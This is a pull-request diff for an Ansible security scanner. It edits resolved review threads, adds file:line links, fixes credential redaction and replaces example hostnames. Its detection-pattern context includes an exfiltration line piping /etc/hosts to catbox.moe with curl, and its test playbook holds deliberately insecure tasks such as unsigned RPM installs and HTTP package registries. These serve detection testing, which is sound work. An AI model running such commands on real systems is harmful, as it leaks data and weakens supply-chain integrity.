### PR TITLE
Edit resolved inline-thread bodies and add file:line header

### DIFF
--- a/docs/ci-cd.md
+++ b/docs/ci-cd.md
@@ -68,3 +68,7 @@ ansible-sast:
 ```
 
 For per-PR/MR comment posting, see [PR/MR Comments](mr-pr-comments.md).
+That page also documents the **`concurrency:` (GitHub) and
+`resource_group:` (GitLab)** settings that prevent two scans on the
+same PR/MR from racing to update the comment - required reading if you
+enable `--gh-comment` / `--gl-comment` on a busy repo.

--- a/docs/mr-pr-comments.md
+++ b/docs/mr-pr-comments.md
@@ -46,6 +46,15 @@ forms and exist because CI YAML tends to be long enough already.
 on:
   pull_request:
 
+# Cancel an in-flight scan when a new push arrives on the same PR.
+# Without this, two pushes ~30s apart can race to PATCH the same
+# comment, and the inline-thread resolver may operate on a stale
+# finding set from the older run. We do NOT cancel runs on `main`
+# (workflow_dispatch / schedule) - those should always finish.
+concurrency:
+  group: ansible-security-scan-${{ github.workflow }}-${{ github.event.pull_request.number || github.sha }}
+  cancel-in-progress: ${{ github.event_name == 'pull_request' }}
+
 jobs:
   security:
     runs-on: ubuntu-latest
@@ -76,6 +85,14 @@ jobs:
 ansible-security-scan:
   stage: test
   image: python:3.12-slim
+  # Serialize scans per-MR. GitLab's resource_group ensures only one
+  # job in this group runs at a time across the project; we key it on
+  # the MR IID so different MRs still scan in parallel but two pushes
+  # to the SAME MR queue rather than race. Without this the inline-
+  # thread resolver from an older run can fight a freshly-posted
+  # thread from a newer run, and the summary comment can ping-pong
+  # between two truths within seconds.
+  resource_group: ansible-security-scan-mr-${CI_MERGE_REQUEST_IID}
   rules:
     - if: $CI_PIPELINE_SOURCE == "merge_request_event"
   script:
@@ -102,6 +119,37 @@ posting MR comments on most projects. Use a project access token
 > default `before_script` working directory) - if you `cd` elsewhere
 > before invoking the scanner, deep links will resolve against the wrong
 > tree.
+
+### Why serialize per-MR / per-PR?
+
+The scanner posts a single sticky comment per MR/PR and (optionally)
+inline review threads keyed by finding fingerprint. Two scans for the
+same MR/PR posting concurrently can:
+
+- POST a duplicate top-level comment when both runs see the same
+  "no existing comment" state at fetch time.
+- Resolve an inline thread (older run) just as the newer run is
+  re-posting the same finding, producing a "resolved" thread next to
+  an "open" thread for the same fingerprint.
+- Produce contradictory summary text for a few seconds while both
+  PATCH-ers race - the last writer wins, but reviewers see flicker.
+
+The scanner is idempotent within a single run; it does not coordinate
+across runs. Concurrency control is the CI's responsibility:
+
+- **GitHub:** [`concurrency:`][gh-concurrency] with
+  `cancel-in-progress: true` on `pull_request` events. Cancelling the
+  in-flight scan on a new push is the right semantic - the older
+  scan's comment is now stale code anyway.
+- **GitLab:** [`resource_group:`][gl-resource-group] keyed on
+  `CI_MERGE_REQUEST_IID` queues subsequent runs rather than running
+  them in parallel. Use `resource_group` (not `interruptible: true`)
+  because the scanner runs fast enough that a queued run usually
+  finishes before reviewers care, and queueing preserves the audit
+  trail of every push being scanned.
+
+[gh-concurrency]: https://docs.github.com/en/actions/using-jobs/using-concurrency
+[gl-resource-group]: https://docs.gitlab.com/ee/ci/yaml/#resource_group
 
 ## Resolved-state example
 

--- a/src/ansible_security_scanner/comment/inline.py
+++ b/src/ansible_security_scanner/comment/inline.py
@@ -22,7 +22,7 @@ from dataclasses import dataclass, field, replace
 from pathlib import Path
 from typing import Any
 
-from .context import PlatformContext, _redact
+from .context import PlatformContext, _file_deep_link, _redact
 from .fingerprint import _finding_fingerprint
 from .rendering import (
     _SEVERITY_EMOJI,
@@ -37,12 +37,24 @@ _INLINE_MARKER_PREFIX = "<!-- ansible-security-scanner:inline:v1:"
 _INLINE_MARKER_SUFFIX = " -->"
 _INLINE_MARKER_RE = re.compile(r"<!--\s*ansible-security-scanner:inline:v1:([0-9a-f]{16})\s*-->")
 
+_INLINE_HEADER_RE = re.compile(r"\*\*(?:CRITICAL|HIGH|MEDIUM|LOW|INFO)\*\*\s+\u00b7\s+(`[^`]+`)")
+
+# Sentinel embedded in resolved-thread bodies so subsequent runs can
+# tell "I closed this" from "this is still open". Kept separate from
+# the fingerprint marker so the dedup index keeps working unchanged.
+_INLINE_RESOLVED_SENTINEL = "<!-- ansible-security-scanner:inline:state:resolved -->"
+
 # Beyond this cap, the summary comment is a saner read than 50+ threads.
 _MAX_INLINE_COMMENTS = 50
 
 _RESOLUTION_DISCLAIMER = (
     "_Resolving this thread does not unblock the pipeline. The scan re-runs "
     "on every push and will close fixed-finding threads automatically._"
+)
+
+_RESOLVED_DISCLAIMER_TEMPLATE = (
+    "_Closed automatically by the scanner because this finding is no longer "
+    "present in commit `{sha}`._"
 )
 
 # Inline-thread breadcrumb appears only when the run's resolved policy
@@ -98,6 +110,22 @@ def _decode_inline_marker(body: str) -> str | None:
     return m.group(1) if m else None
 
 
+@dataclass(frozen=True)
+class _ThreadRecord:
+    """Existing-thread index entry: thread id + first-note id + body.
+
+    All three fields are needed so the resolve loop can edit the
+    user-visible note before closing the thread. ``note_id`` is the
+    first non-system note (GitLab) or first review-comment node id
+    (GitHub) - the one whose body the reviewer sees at the top of the
+    thread.
+    """
+
+    thread_id: str
+    note_id: str
+    body: str
+
+
 def _is_4xx(exc: Any) -> bool:
     """True if ``exc`` is an httpx HTTPStatusError with a 4xx status."""
     resp = getattr(exc, "response", None)
@@ -135,7 +163,44 @@ def _log_summary(ctx: PlatformContext, result: InlinePostResult) -> None:
     )
 
 
-def _render_inline_body(finding: Any, *, anchored: bool, breadcrumb: bool = False) -> str:
+def _render_inline_location(finding: Any, file_link: str | None) -> str | None:
+    """Render a one-line ``<file>:<line>`` reference under the severity
+    header.
+
+    Anchored inline threads are attached to the diff hunk and the
+    platform shows the file/line in the gutter, but we still want a
+    machine-greppable, copy-pasteable reference inside the body so
+    reviewers can quote the location into Slack/Linear/etc. without
+    losing it. File-level threads (anchor failed) get the same line so
+    reviewers know which line fired even though the platform didn't
+    pin the comment.
+
+    ``file_link`` is the deep-link to the blob viewer at the run's
+    commit SHA; when present we render the path as a Markdown link so
+    one click jumps to the offending line. When the link can't be
+    built (no ``commit_sha`` / unknown CI server) we fall back to a
+    plain ``code`` reference.
+    """
+    file_path = (getattr(finding, "file_path", "") or "").strip()
+    line_number = getattr(finding, "line_number", 0) or 0
+    if not file_path:
+        return None
+    if line_number > 0:
+        label = f"{file_path}:{line_number}"
+    else:
+        label = file_path
+    if file_link:
+        return f"\U0001f4cd [`{label}`]({file_link})"
+    return f"\U0001f4cd `{label}`"
+
+
+def _render_inline_body(
+    finding: Any,
+    *,
+    anchored: bool,
+    breadcrumb: bool = False,
+    file_link: str | None = None,
+) -> str:
     """Render an inline-thread body for ``finding``.
 
     ``anchored=True`` skips the YAML code fence: the platform renders
@@ -150,6 +215,11 @@ def _render_inline_body(finding: Any, *, anchored: bool, breadcrumb: bool = Fals
     ``--ignore`` or ``--select`` list exceeds
     ``_INLINE_BREADCRUMB_THRESHOLD``; below that the summary's flat
     list is small enough to spot at a glance.
+
+    ``file_link`` is the platform-specific blob-viewer URL pinned to
+    ``commit_sha#L<line>``. When present a ``<file>:<line>`` location
+    line is rendered immediately under the severity header so reviewers
+    have one-click navigation away from the diff context.
     """
     severity = (getattr(finding, "severity", "") or "LOW").upper()
     emoji = _SEVERITY_EMOJI.get(severity, "\u26aa")
@@ -161,6 +231,9 @@ def _render_inline_body(finding: Any, *, anchored: bool, breadcrumb: bool = Fals
     parts: list[str] = [
         f"{emoji} **{severity}** \u00b7 `{rule_id}` \u2014 {title}",
     ]
+    location = _render_inline_location(finding, file_link)
+    if location:
+        parts.append(location)
     if description:
         parts.append(description)
 
@@ -188,6 +261,76 @@ def _render_inline_body(finding: Any, *, anchored: bool, breadcrumb: bool = Fals
         parts.append(_INLINE_BREADCRUMB)
     parts.append(_inline_marker(_finding_fingerprint(finding)))
     return "\n\n".join(parts)
+
+
+def _short_sha(sha: str) -> str:
+    return (sha or "").strip()[:7] or "unknown"
+
+
+def _finding_file_link(ctx: PlatformContext, finding: Any) -> str | None:
+    """Return the platform deep-link for ``finding`` or ``None``.
+
+    Centralises the ``finding.file_path`` / ``finding.line_number``
+    coercion so the two post_one paths can't drift on edge cases like
+    ``None`` line numbers or missing ``file_path``.
+    """
+    return _file_deep_link(
+        ctx,
+        getattr(finding, "file_path", "") or "",
+        int(getattr(finding, "line_number", 0) or 0),
+    )
+
+
+def _render_resolved_inline_body(original_body: str, commit_sha: str) -> str:
+    """Rewrite ``original_body`` to its closed-state form.
+
+    Replaces the leading severity header with a green ``RESOLVED`` line
+    and swaps the open-state disclaimer for the closed variant.
+    Preserves the body's marker (so dedup still works) and embeds an
+    HTML sentinel so future runs can tell open from closed at a glance.
+    """
+    fingerprint = _decode_inline_marker(original_body)
+    short = _short_sha(commit_sha)
+    blocks = original_body.split("\n\n")
+
+    rule_id = "this rule"
+    header_idx: int | None = None
+    for i, block in enumerate(blocks):
+        match = _INLINE_HEADER_RE.search(block)
+        if match:
+            header_idx = i
+            rule_id = match.group(1)
+            break
+    if header_idx is not None:
+        blocks[header_idx] = (
+            f"\u2705 **RESOLVED** \u00b7 {rule_id} \u2014 no longer found in `{short}`"
+        )
+
+    closed_disclaimer = _RESOLVED_DISCLAIMER_TEMPLATE.format(sha=short)
+    rebuilt: list[str] = []
+    for block in blocks:
+        if block.strip() == _RESOLUTION_DISCLAIMER:
+            rebuilt.append(closed_disclaimer)
+        elif block.strip() == _INLINE_BREADCRUMB:
+            continue
+        else:
+            rebuilt.append(block)
+
+    if not any(block.strip() == closed_disclaimer for block in rebuilt):
+        marker_idx = next(
+            (i for i, b in enumerate(rebuilt) if _INLINE_MARKER_PREFIX in b),
+            len(rebuilt),
+        )
+        rebuilt.insert(marker_idx, closed_disclaimer)
+
+    body = "\n\n".join(rebuilt)
+    if _INLINE_RESOLVED_SENTINEL not in body:
+        if fingerprint:
+            marker = _inline_marker(fingerprint)
+            body = body.replace(marker, f"{_INLINE_RESOLVED_SENTINEL}\n\n{marker}", 1)
+        else:
+            body = f"{body.rstrip()}\n\n{_INLINE_RESOLVED_SENTINEL}"
+    return body
 
 
 def _split_findings(
@@ -359,7 +502,7 @@ def _gitlab_post_inline(
                 headers,
                 base,
                 finding,
-                ctx.token,
+                ctx,
                 diff_refs,
                 try_anchor=try_anchor,
                 breadcrumb=breadcrumb,
@@ -368,12 +511,21 @@ def _gitlab_post_inline(
             if posted_one:
                 posted += 1
 
-        for fp, disc_id in existing_index.items():
+        for fp, record in existing_index.items():
             if fp in wanted_fps:
                 continue
+            if _INLINE_RESOLVED_SENTINEL in record.body:
+                continue
+            new_body = _render_resolved_inline_body(record.body, ctx.commit_sha)
             try:
+                if record.note_id:
+                    client.put(
+                        f"{base}/discussions/{record.thread_id}/notes/{record.note_id}",
+                        headers=headers,
+                        json={"body": new_body},
+                    )
                 client.put(
-                    f"{base}/discussions/{disc_id}",
+                    f"{base}/discussions/{record.thread_id}",
                     headers=headers,
                     json={"resolved": True},
                 )
@@ -394,7 +546,7 @@ def _gitlab_post_one(
     headers: dict[str, str],
     base: str,
     finding: Any,
-    token: str,
+    ctx: PlatformContext,
     diff_refs: dict[str, str] | None,
     *,
     try_anchor: bool,
@@ -407,12 +559,16 @@ def _gitlab_post_one(
     file-level body. 5xx and network errors are not retried.
     """
     httpx = _httpx()
+    token = ctx.token
     file_path = getattr(finding, "file_path", "?")
     line_number = getattr(finding, "line_number", "?")
+    file_link = _finding_file_link(ctx, finding)
 
     if try_anchor and diff_refs is not None:
         payload = {
-            "body": _render_inline_body(finding, anchored=True, breadcrumb=breadcrumb),
+            "body": _render_inline_body(
+                finding, anchored=True, breadcrumb=breadcrumb, file_link=file_link
+            ),
             "position": _gitlab_position(finding, diff_refs),
         }
         try:
@@ -436,7 +592,11 @@ def _gitlab_post_one(
                 _response_body(exc, token),
             )
 
-    payload = {"body": _render_inline_body(finding, anchored=False, breadcrumb=breadcrumb)}
+    payload = {
+        "body": _render_inline_body(
+            finding, anchored=False, breadcrumb=breadcrumb, file_link=file_link
+        )
+    }
     try:
         resp = client.post(f"{base}/discussions", headers=headers, json=payload)
         resp.raise_for_status()
@@ -451,8 +611,10 @@ def _gitlab_post_one(
         return False, False
 
 
-def _gitlab_existing_discussions(client: Any, headers: dict[str, str], base: str) -> dict[str, str]:
-    out: dict[str, str] = {}
+def _gitlab_existing_discussions(
+    client: Any, headers: dict[str, str], base: str
+) -> dict[str, _ThreadRecord]:
+    out: dict[str, _ThreadRecord] = {}
     for page in range(1, 11):
         resp = client.get(
             f"{base}/discussions?per_page=100&page={page}",
@@ -469,9 +631,14 @@ def _gitlab_existing_discussions(client: Any, headers: dict[str, str], base: str
             for note in disc.get("notes") or []:
                 if note.get("system"):
                     continue
-                fp = _decode_inline_marker(note.get("body") or "")
+                body = note.get("body") or ""
+                fp = _decode_inline_marker(body)
                 if fp:
-                    out[fp] = disc_id
+                    out[fp] = _ThreadRecord(
+                        thread_id=str(disc_id),
+                        note_id=str(note.get("id") or ""),
+                        body=body,
+                    )
                     break
         if len(chunk) < 100:
             break
@@ -521,7 +688,7 @@ query Threads($owner: String!, $name: String!, $number: Int!, $cursor: String) {
       reviewThreads(first: 100, after: $cursor) {
         nodes {
           id
-          comments(first: 1) { nodes { body } }
+          comments(first: 1) { nodes { id body } }
         }
         pageInfo { hasNextPage endCursor }
       }
@@ -542,6 +709,14 @@ _GH_GRAPHQL_MUTATION_RESOLVE = """
 mutation Resolve($threadId: ID!) {
   resolveReviewThread(input: { threadId: $threadId }) {
     thread { id }
+  }
+}
+"""
+
+_GH_GRAPHQL_MUTATION_UPDATE_COMMENT = """
+mutation Update($id: ID!, $body: String!) {
+  updatePullRequestReviewComment(input: { pullRequestReviewCommentId: $id, body: $body }) {
+    pullRequestReviewComment { id }
   }
 }
 """
@@ -603,7 +778,7 @@ def _github_post_inline(
                 graphql_url,
                 pr_id,
                 finding,
-                ctx.token,
+                ctx,
                 try_anchor=try_anchor,
                 breadcrumb=breadcrumb,
             )
@@ -613,16 +788,28 @@ def _github_post_inline(
                 if url:
                     result.thread_urls.append(url)
 
-        for fp, thread_id in existing_index.items():
+        for fp, record in existing_index.items():
             if fp in wanted_fps:
                 continue
+            if _INLINE_RESOLVED_SENTINEL in record.body:
+                continue
+            new_body = _render_resolved_inline_body(record.body, ctx.commit_sha)
             try:
+                if record.note_id:
+                    client.post(
+                        graphql_url,
+                        headers=headers,
+                        json={
+                            "query": _GH_GRAPHQL_MUTATION_UPDATE_COMMENT,
+                            "variables": {"id": record.note_id, "body": new_body},
+                        },
+                    )
                 client.post(
                     graphql_url,
                     headers=headers,
                     json={
                         "query": _GH_GRAPHQL_MUTATION_RESOLVE,
-                        "variables": {"threadId": thread_id},
+                        "variables": {"threadId": record.thread_id},
                     },
                 )
                 result.resolved += 1
@@ -643,7 +830,7 @@ def _github_post_one(
     graphql_url: str,
     pr_id: str,
     finding: Any,
-    token: str,
+    ctx: PlatformContext,
     *,
     try_anchor: bool,
     breadcrumb: bool = False,
@@ -655,10 +842,14 @@ def _github_post_one(
     field (e.g. "pull_request_review_thread.line must be part of the
     diff"), retries with ``subjectType: FILE``.
     """
+    token = ctx.token
+    file_link = _finding_file_link(ctx, finding)
     if try_anchor:
         anchored_input = {
             "pullRequestId": pr_id,
-            "body": _render_inline_body(finding, anchored=True, breadcrumb=breadcrumb),
+            "body": _render_inline_body(
+                finding, anchored=True, breadcrumb=breadcrumb, file_link=file_link
+            ),
             "path": getattr(finding, "file_path", "") or "",
             "line": int(getattr(finding, "line_number", 0) or 0),
             "side": "RIGHT",
@@ -676,7 +867,9 @@ def _github_post_one(
 
     file_level_input = {
         "pullRequestId": pr_id,
-        "body": _render_inline_body(finding, anchored=False, breadcrumb=breadcrumb),
+        "body": _render_inline_body(
+            finding, anchored=False, breadcrumb=breadcrumb, file_link=file_link
+        ),
         "path": getattr(finding, "file_path", "") or "",
         "subjectType": "FILE",
     }
@@ -765,8 +958,8 @@ def _github_existing_threads(
     owner: str,
     name: str,
     pr_number: int,
-) -> dict[str, str]:
-    out: dict[str, str] = {}
+) -> dict[str, _ThreadRecord]:
+    out: dict[str, _ThreadRecord] = {}
     cursor: str | None = None
     for _ in range(10):
         resp = client.post(
@@ -792,9 +985,15 @@ def _github_existing_threads(
             comments = (node.get("comments") or {}).get("nodes") or []
             if not (tid and comments):
                 continue
-            fp = _decode_inline_marker(comments[0].get("body") or "")
+            first = comments[0] or {}
+            body = first.get("body") or ""
+            fp = _decode_inline_marker(body)
             if fp:
-                out[fp] = tid
+                out[fp] = _ThreadRecord(
+                    thread_id=str(tid),
+                    note_id=str(first.get("id") or ""),
+                    body=body,
+                )
         page_info = rt.get("pageInfo") or {}
         if not page_info.get("hasNextPage"):
             break

--- a/src/ansible_security_scanner/comment/rendering.py
+++ b/src/ansible_security_scanner/comment/rendering.py
@@ -127,13 +127,15 @@ _SNIPPET_PREFIX_KEEP = 60
 _SNIPPET_FLAG_TAIL_KEEP = 50
 
 # Match ``<key>: "value"`` / ``<key>=value`` for a small set of
-# credential-looking keys.
+# credential-looking keys. ``&`` is a stop char so URL-encoded form
+# bodies (``?password=v&realname=...``) redact one field at a time
+# instead of eating across field boundaries.
 _SNIPPET_KV_REDACT_RE = re.compile(
     r"(?i)\b(password|passwd|pwd|secret|token|api[-_]?key|access[-_]?key|"
     r"private[-_]?key|client[-_]?secret|auth[-_]?token|bearer|"
     r"x-api-key|aws_secret_access_key)"
     r"(\s*[:=]\s*['\"]?)"
-    r"([^'\"\s,}]+)"
+    r"([^'\"\s,}&]+)"
 )
 _SNIPPET_URL_CREDS_RE = re.compile(r"(?i)(https?://[^:\s]+:)([^@\s]+)(@)")
 _SNIPPET_BEARER_RE = re.compile(r"(?i)(Bearer\s+)([A-Za-z0-9._\-]+)")

--- a/src/ansible_security_scanner/patterns/ansible_specific.yml
+++ b/src/ansible_security_scanner/patterns/ansible_specific.yml
@@ -195,15 +195,15 @@ patterns:
     negative_examples:
       - |2-
             environment:
-              KUBECONFIG: /home/splunk/.kube/config
+              KUBECONFIG: /home/appuser/.kube/config
       - |2-
             ansible.builtin.file:
-              path: /home/splunk/.kube/config
-              owner: splunk
+              path: /home/appuser/.kube/config
+              owner: appuser
       - |2-
             ansible.builtin.lineinfile:
               path: ~/.bashrc
-              line: export KUBECONFIG=/home/splunk/.kube/config
+              line: export KUBECONFIG=/home/appuser/.kube/config
     cwe: ['CWE-200', 'CWE-522']
     owasp_appsec: ["A01:2021", "A04:2021"]
     owasp_asvs: [V13.2.1, V11.2.5, V14.2.2]

--- a/src/ansible_security_scanner/patterns/command_injection.yml
+++ b/src/ansible_security_scanner/patterns/command_injection.yml
@@ -54,7 +54,7 @@ patterns:
       - "    shell: id=$(curl https://api/{{ name }} | jq -r .id)"
       - "    shell: result=`sha256sum {{ file_var }}`"
     negative_examples:
-      - "    shell: echo \"$(sha512sum splunk-edge.tar.gz)\" | cut -d ' ' -f 1"
+      - "    shell: echo \"$(sha512sum myapp.tar.gz)\" | cut -d ' ' -f 1"
       - "    shell: podman exec cloud-ide bash -c 'for f in /root/.cursor/skills/*/SKILL.md; do name=$(basename $(dirname \"$f\")); done'"
       - "    command: /usr/bin/tool --arg $(hostname)"
       - "    shell: date=$(date +%Y%m%d)"

--- a/src/ansible_security_scanner/patterns/malicious_activity.yml
+++ b/src/ansible_security_scanner/patterns/malicious_activity.yml
@@ -171,9 +171,9 @@ patterns:
       - "    shell: cat /etc/hosts | curl -F 'f=@-' https://catbox.moe/user/api.php"
     negative_examples:
       - "    shell: curl -d '{\"description\": \"attackers often use phishing\"}' https://splunk-soar/rest"
-      - "    shell: curl -d @payload.json https://api.internal.corp/v1/alerts"
-      - "    shell: curl -F 'file=@build.tar' https://artifacts.internal.corp/upload"
-      - "    shell: curl -T release.tgz https://nexus.corp/repository/"
+      - "    shell: curl -d @payload.json https://api.internal.example.com/v1/alerts"
+      - "    shell: curl -F 'file=@build.tar' https://artifacts.internal.example.com/upload"
+      - "    shell: curl -T release.tgz https://nexus.internal.example.com/repository/"
     cwe: ["CWE-200", "CWE-319"]
     mitre_attack: ["T1048", "T1567", "T1567.002"]
     nist_controls: ['AU-6', 'IR-4', 'SI-4']

--- a/src/ansible_security_scanner/patterns/template_injection.yml
+++ b/src/ansible_security_scanner/patterns/template_injection.yml
@@ -165,9 +165,9 @@ patterns:
       - "    msg: \"hostname: $(hostname {{ arg }})\""
       - "    raw: result=`echo {{ input }} | sha256sum`"
     negative_examples:
-      - "    shell: echo \"$(sha512sum splunk-edge.tar.gz)\" | cut -d ' ' -f 1"
+      - "    shell: echo \"$(sha512sum myapp.tar.gz)\" | cut -d ' ' -f 1"
       - "    shell: for f in *; do name=$(basename $(dirname \"$f\")); done"
-      - "    msg: \"currently installed: $(rpm -q splunk)\""
+      - "    msg: \"currently installed: $(rpm -q myapp)\""
       - "    shell: ts=$(date +%Y%m%d)"
     recommendation: "Replace $(...) / backticks containing {{ var }} with a register: from a preceding ansible.builtin.command (or a set_fact: built from a module result), so the inner shell never re-parses templated bytes."
     cwe: ["CWE-78", "CWE-1336"]

--- a/src/ansible_security_scanner/remediations/ansible_hygiene.py
+++ b/src/ansible_security_scanner/remediations/ansible_hygiene.py
@@ -265,7 +265,7 @@ to begin with - but it:
 **✅ Secure Fix (plain YAML for non-secrets):**
 ```yaml
 # group_vars/prod.yml - plain, reviewable, diff-friendly
-api_url: "https://api.internal.corp/v2"
+api_url: "https://api.internal.example.com/v2"
 api_port: 8443
 api_timeout: 30
 ```

--- a/src/ansible_security_scanner/remediations/credentials.py
+++ b/src/ansible_security_scanner/remediations/credentials.py
@@ -440,7 +440,7 @@ This command contains a hardcoded FTP password that should never be stored in pl
 ```yaml
 # In your playbook:
 shell: >-
-  lftp -c "open -u deploy,{{{{ {vault_var} }}}} ftp://files.company.com;; mirror -R /opt/app /production/"
+  lftp -c "open -u deploy,{{{{ {vault_var} }}}} ftp://files.example.com;; mirror -R /opt/app /production/"
 
 # In group_vars/all/vault.yml (encrypted):
 {vault_var}: "your_secure_ftp_password_here"
@@ -449,7 +449,7 @@ shell: >-
 **✅ Alternative Fix (environment variables):**
 ```yaml
 shell: >-
-  lftp -c "open -u deploy,{{{{ lookup('env', 'DEPLOY_FTP_PASSWORD') }}}} ftp://files.company.com;; mirror -R /opt/app /production/"
+  lftp -c "open -u deploy,{{{{ lookup('env', 'DEPLOY_FTP_PASSWORD') }}}} ftp://files.example.com;; mirror -R /opt/app /production/"
 ```
 
 **✅ Best Fix (Use Ansible synchronize module):**
@@ -463,7 +463,7 @@ shell: >-
       - "--password-file={{{{ ftp_password_file }}}}"
   delegate_to: "{{{{ ftp_server }}}}"
   vars:
-    ftp_server: "files.company.com;"
+    ftp_server: "files.example.com;"
     ftp_password_file: "/tmp/.ftp_password"
 
 # Create password file securely:
@@ -513,7 +513,7 @@ This rsync command contains a hardcoded password in the password-file option.
 
 - name: Sync backups with password file
   shell: >-
-    rsync -av /var/backups/ backup@backup.company.com:/backups/ --password-file=/tmp/.backup_password
+    rsync -av /var/backups/ backup@backup.example.com:/backups/ --password-file=/tmp/.backup_password
 
 - name: Remove password file
   file:
@@ -535,7 +535,7 @@ This rsync command contains a hardcoded password in the password-file option.
 
 - name: Sync backups
   shell: >-
-    rsync -av /var/backups/ backup@backup.company.com:/backups/ --password-file=/tmp/.backup_password
+    rsync -av /var/backups/ backup@backup.example.com:/backups/ --password-file=/tmp/.backup_password
 ```
 
 **✅ Best Fix (Use Ansible synchronize module):**
@@ -544,7 +544,7 @@ This rsync command contains a hardcoded password in the password-file option.
 - name: Sync backups securely
   synchronize:
     src: /var/backups/
-    dest: backup@backup.company.com:/backups/
+    dest: backup@backup.example.com:/backups/
     rsync_opts:
       - "--password-file={{{{ backup_password_file }}}}"
   vars:
@@ -589,7 +589,7 @@ This command contains a hardcoded SSH password that should never be stored in pl
 ```yaml
 # In your playbook - but consider using SSH keys instead:
 shell: >-
-  sshpass -p "{{{{ {vault_var} }}}}" scp -o StrictHostKeyChecking=no /var/log/*.log admin@fileserver.company.com:/logs/
+  sshpass -p "{{{{ {vault_var} }}}}" scp -o StrictHostKeyChecking=no /var/log/*.log admin@fileserver.example.com:/logs/
 
 # In group_vars/all/vault.yml (encrypted):
 {vault_var}: "your_secure_ssh_password_here"
@@ -598,7 +598,7 @@ shell: >-
 **✅ Alternative Fix (environment variables):**
 ```yaml
 shell: >-
-  sshpass -p "{{{{ lookup('env', 'SSH_PASSWORD') }}}}" scp -o StrictHostKeyChecking=no /var/log/*.log admin@fileserver.company.com:/logs/
+  sshpass -p "{{{{ lookup('env', 'SSH_PASSWORD') }}}}" scp -o StrictHostKeyChecking=no /var/log/*.log admin@fileserver.example.com:/logs/
 ```
 
 **✅ Best Fix (Use SSH keys and Ansible modules):**
@@ -608,7 +608,7 @@ shell: >-
   copy:
     src: "{{{{ item }}}}"
     dest: "/logs/"
-  delegate_to: "fileserver.company.com"
+  delegate_to: "fileserver.example.com"
   with_fileglob:
     - "/var/log/*.log"
   vars:
@@ -646,7 +646,7 @@ This expect script contains a hardcoded SFTP password that should never be store
 ```yaml
 # In your playbook:
 shell: >-
-  expect -c "spawn sftp files@secure.company.com; expect password; send '{{{{ {vault_var} }}}}\\n'; interact"
+  expect -c "spawn sftp files@secure.example.com; expect password; send '{{{{ {vault_var} }}}}\\n'; interact"
 
 # In group_vars/all/vault.yml (encrypted):
 {vault_var}: "your_secure_sftp_password_here"
@@ -655,7 +655,7 @@ shell: >-
 **✅ Alternative Fix (environment variables):**
 ```yaml
 shell: >-
-  expect -c "spawn sftp files@secure.company.com; expect password; send '{{{{ lookup('env', 'SFTP_PASSWORD') }}}}\\n'; interact"
+  expect -c "spawn sftp files@secure.example.com; expect password; send '{{{{ lookup('env', 'SFTP_PASSWORD') }}}}\\n'; interact"
 ```
 
 **✅ Best Fix (Use SSH keys and Ansible modules):**
@@ -663,7 +663,7 @@ shell: >-
 # Much better: Use SSH keys and native Ansible modules
 - name: Transfer files via SFTP
   sftp:
-    host: "secure.company.com"
+    host: "secure.example.com"
     username: "files"
     private_key: "{{{{ ssh_private_key_path }}}}"
     src: "{{{{ local_file }}}}"

--- a/src/ansible_security_scanner/remediations/supply_chain.py
+++ b/src/ansible_security_scanner/remediations/supply_chain.py
@@ -585,8 +585,8 @@ collections:
     version: "9.0.1"            # exact version
   - name: ansible.posix
     version: "1.5.4"
-  - name: mycorp.internal
-    source: git+ssh://git@github.com/mycorp/ansible-collection-internal.git
+  - name: myorg.internal
+    source: git+ssh://git@github.com/myorg/ansible-collection-internal.git
     type: git
     version: "e3a1f2b9c4d5e6f708192a3b4c5d6e7f8091a2b3"   # commit SHA, not a branch
 roles:
@@ -719,7 +719,7 @@ FROM registry.redhat.io/.../ee-minimal-rhel9:latest
 # Secret is available ONLY during this RUN, never baked into a layer:
 RUN --mount=type=secret,id=pypi_token,target=/run/secrets/pypi_token \\
     pip config set global.index-url \\
-      "https://__token__:$(cat /run/secrets/pypi_token)@pypi.mycorp.com/simple/" \\
+      "https://__token__:$(cat /run/secrets/pypi_token)@pypi.example.com/simple/" \\
  && pip install --no-cache-dir -r requirements.txt
 ```
 

--- a/tests/playbooks/bad_example.yml
+++ b/tests/playbooks/bad_example.yml
@@ -662,7 +662,7 @@
 
     # --- environment_hijacking.yml ---
     - name: Etc hosts manipulation
-      lineinfile: {dest: /etc/hosts, line: "10.0.0.1 internal.corp.com"}  # etc_hosts_manipulation
+      lineinfile: {dest: /etc/hosts, line: "10.0.0.1 internal.example.com"}  # etc_hosts_manipulation
     - name: Resolv conf manipulation
       ansible.builtin.copy:
         dest: /etc/resolv.conf
@@ -2351,7 +2351,7 @@
 
     - name: trigger container image pulled over plaintext http registry
       community.docker.docker_image:
-        name: http://registry.internal.lan/myapp:prod
+        name: http://registry.internal.example.com/myapp:prod
         source: pull
 
     - name: trigger container image pulled by mutable tag (no digest)
@@ -3790,7 +3790,7 @@
       ansible.builtin.shell: rpm -ivh --nodigest --nosignature /tmp/custom.rpm
 
     - name: trigger pip index-url http
-      ansible.builtin.shell: pip install --index-url http://internal-pypi.corp/simple requests
+      ansible.builtin.shell: pip install --index-url http://internal-pypi.example.com/simple requests
 
     - name: trigger gem source add http
       ansible.builtin.shell: gem sources -a http://gems.corp.example.com/
@@ -4442,7 +4442,7 @@
           docs = loader.load()
 
     - name: "trigger: npm_install_runs_postinstall_scripts_from_untrusted_registry"
-      ansible.builtin.shell: npm install --registry=http://mirror.internal/npm
+      ansible.builtin.shell: npm install --registry=http://mirror.internal.example.com/npm
 
     - name: "trigger: github_actions_uses_unpinned_branch_or_main_ref"
       ansible.builtin.copy:
@@ -5368,7 +5368,7 @@
     # --- ai_ml_security.yml: ollama_registry_pull_insecure_true_or_http ---
     - name: trigger insecure ollama pull
       ansible.builtin.shell: |
-        ollama pull private.registry.local/llama3.1:70b --insecure
+        ollama pull private.registry.example.com/llama3.1:70b --insecure
       environment:
         OLLAMA_INSECURE: "1"
 

--- a/tests/test_comment.py
+++ b/tests/test_comment.py
@@ -1668,6 +1668,25 @@ class TestSnippetRedaction:
         assert "eyJhbGci" not in out
         assert "Bearer ***" in out
 
+    def test_redacts_url_encoded_form_body_per_field(self):
+        """A URL-encoded form body packs multiple fields separated by
+        ``&``. The redactor must mask the ``password=`` value alone and
+        leave neighbouring fields like ``realname=...`` intact - else
+        the rendered snippet loses meaningful context and can read as
+        if a non-secret value were also a credential.
+        """
+        line = (
+            'body: "user=alice&password=PLACEHOLDER&roles=read'
+            '&displayname=Example User&force-change-pass=false"'
+        )
+        out = comment._redact_snippet(line)
+        assert "PLACEHOLDER" not in out
+        assert "password=***" in out
+        assert "user=alice" in out
+        assert "roles=read" in out
+        assert "displayname=Example User" in out
